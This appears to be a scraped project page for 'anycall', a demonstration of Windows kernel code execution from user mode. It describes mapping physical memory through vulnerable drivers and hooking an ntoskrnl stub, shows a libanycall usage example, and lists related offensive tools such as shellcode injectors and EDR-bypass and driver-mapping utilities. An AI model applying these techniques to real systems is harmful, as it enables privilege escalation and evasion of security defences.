x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

Overview

anycall

x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html

How it works

  1. Allocate physical memory to user virtual memory
    • Allows user-process to manupulate arbitrary physical memory without calling APIs
  2. Search entire physical memory until we found function stub to hook, in ntoskrnl.exe physical memory
  3. Once the stub found, place inline-hook on the stub
    • simply jmp rax, detour address could be anything we want to invoke
  4. syscall it
  5. wow, we are user-mode but able to call kernel APIs

Goal of this project

This project is to demonstrate how drivers that allowing user-process to map physical memory for user, and how it is critical vulnerable.

Related CVEs:

libanycall

libanycall is the powerful c++ static-library that makes exploit execution of anycall more easily.

Usage

  1. link it (e.g, #pragma comment( lib, "libanycall64" ))
  2. include (e.g, #include "libanycall.h")

For example:

#include <windows.h>
#include <iostream>

#include "libanycall.h"

#pragma comment( lib, "libanycall64" )

using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }
    
    // invoke NT kernel APIs from usermode
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %d\n", process_id );

    return EXIT_SUCCESS;
}

License

MIT

You might also like...
vdk is a set of utilities used to help with exploitation of a vulnerable driver.

vdk - vulnerable driver kit vdk is a set of utilities used to help with exploitation of a vulnerable driver. There are 2 main features of this library

Windows kernel-mode driver emulating well-known USB game controllers.

Windows kernel-mode driver emulating well-known USB game controllers.

ebpf syscall recording demo project

ebpf syscall recording demo project

hooking the execve syscall, to randomly sabotage typed bash commands.

Syscall hooks A small project of hooking the execve() syscall, to randomly sabotage typed bash commands. This project was tested on 5.11.0-38-generic.

raincoat is a shellcode injector that uses direct syscall invoking.

raincoat is a shellcode injector that uses direct syscall invoking. by liz @realhaxorleet & ellyysium @ellyysium opening the code may cause brain dama

If the button pressed esp will reset and App mode will on. App mode will on then led will on, network is connected led will off.

DHT22-to-Google-sheet-Reset-Using-ESP8266-LED-Switch If button pressed esp will reset and App mode will on. App mode will on then led will on, network

Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!
Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!

Ninja UUID Shellcode Runner Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10! Now supports running Cobalt

very basic and minimalistic hooking "library" for windows (x64 support soon)

IceHook very basic and minimalistic hooking "library" for windows (x64 support soon) Example how to use: typedef void(__stdcall* twglSwapBuffers)(HDC

Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!
Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!

Ninja UUID Shellcode Runner Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10! Now supports running Cobalt

Releases(release_2.0)
  • release_2.0(May 20, 2021)

    Release 2.0 includes libanycall, the powerful c++ static-library for anycall exploit execution.

    Usage

    1. link it (e.g, #pragma comment( lib, "libanycall64" ))
    2. include (e.g, #include "libanycall.h")

    For example:

    #include <windows.h>
    #include <iostream>
    
    #include "libanycall.h"
    
    #pragma comment( lib, "libanycall64" )
    
    using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );
    
    int main( const int argc, const char** argv, const char** envp )
    {
        if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
        {
            printf( "[!] failed to init libanycall\n" );
            return EXIT_FAILURE;
        }
        
        // invoke NT kernel APIs from usermode
        const uint32_t process_id =
            ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );
    
        printf( "PsGetCurrentProcessId returns %d\n", process_id );
    
        return EXIT_SUCCESS;
    }
    
    Source code(tar.gz)
    Source code(zip)
    release_2.0.zip(362.82 KB)
  • release_1.0(May 15, 2021)

    Usage

    anycall64.exe [module name] [procedure name]
    

    *administrator privilege does not required to run

    Following augments are supported:

    • (optional) module name the module exports [procedure name] e.g, ntdll.dll
    • (optional) procedure name the function to hook, used to fetch from both ntoskrnl and [module name] e.g, NtTraceControl

    if not specified, ntdll.dll and NtTraceControl are used.

    Source code(tar.gz)
    Source code(zip)
    release_1.0.zip(20.05 KB)
Some source code to demonstrate avoiding certain direct syscall detections by locating and JMPing to a legitimate syscall instruction within NTDLL.

hiding-your-syscalls What is this? This repository contains all of the source code from my blog post about avoiding direct syscall detections, which y

null 198 Dec 1, 2022
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

null 95 Sep 5, 2022
Upload arbitrary data via Apple's Find My network.

Send My Send My allows you to to upload abritrary data from devices without an internet connection by (ab)using Apple's Find My network. The data is b

Positive Security 1.5k Dec 26, 2022
x64 Windows kernel driver mapper, inject unsigned driver using anycall

anymapper x64 Windows kernel driver mapper, inject unsigned driver using anycall This project is WIP. Todo Fix: Can't make API calls from IAT nor func

Kento Oki 72 Dec 26, 2022
Celeborn is a Userland API Unhooker that I developed for learning Windows APIs and Syscall implementations

Celeborn is a Userland API Unhooker that I developed for learning Windows APIs and Syscall implementations. It mainly detects and patches hooking instructions in NTDLL.dll file. All PRs are welcome!

Furkan Göksel 101 Nov 11, 2022
Loads a signed kernel driver which allows you to map any driver to kernel mode without any traces of the signed / mapped driver.

CosMapper Loads a signed kernel driver (signed with leaked cert) which allows you to map any driver to kernel mode without any traces of the signed /

null 157 Jan 2, 2023
A demonstration of various different techniques for implementing 'threaded code,' a technique used in Forth and in virtual machines like the JVM.

Threaded code is a technique used in the implementation of virtual machines (VMs). It avoids the overhead of calling subroutines repeatedly by 'thread

null 25 Nov 4, 2022
New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.

BOF - Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking ServiceMove is a POC code for an interestin

Chris Au 190 Nov 14, 2022
Signs IPAs on Windows with arbitrary .p12/.mobileprovision files

DumbSigner A mutilated version of Riley Testut's AltServer for Windows to sign IPAs with arbitrary p12 and mobileprovision files on Windows. It works

Raymonf 5 Jun 27, 2022
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust 846 Jan 2, 2023